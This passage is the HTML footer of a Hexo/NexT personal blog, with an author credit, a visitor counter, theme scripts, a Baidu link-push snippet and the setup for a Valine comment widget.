    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ChenZIDu</span>
</div>
  <div class="powered-by">Oinsm
    
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Web – <a href="https://github.com/ChenZIDu" rel="noopener" target="_blank">🙂</a>
    
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








        
      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>




  
<script src="/js/local-search.js"></script>














  

  


<script>
NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(item => {
    return GUEST.includes(item);
  });
  new Valine({
    el: '#comments',
    verify: true,
    notify: true,
    appId: 'Kp900xxAQMLq3K0AkgqsPzcV-gzGzoHsz',
    appKey: 'XdnaoJVs9feaETzUFPUq79tD',
    placeholder: "Just go go",
    avatar: 'robohash',
    meta: guest,
    pageSize: '5' || 10,
    visitor: false,
    lang: '' || 'zh-cn',
    path: location.pathname,
    recordIP: true,
    serverURLs: ''
  });
}, window.Valine);
</script>

</body>
</html>
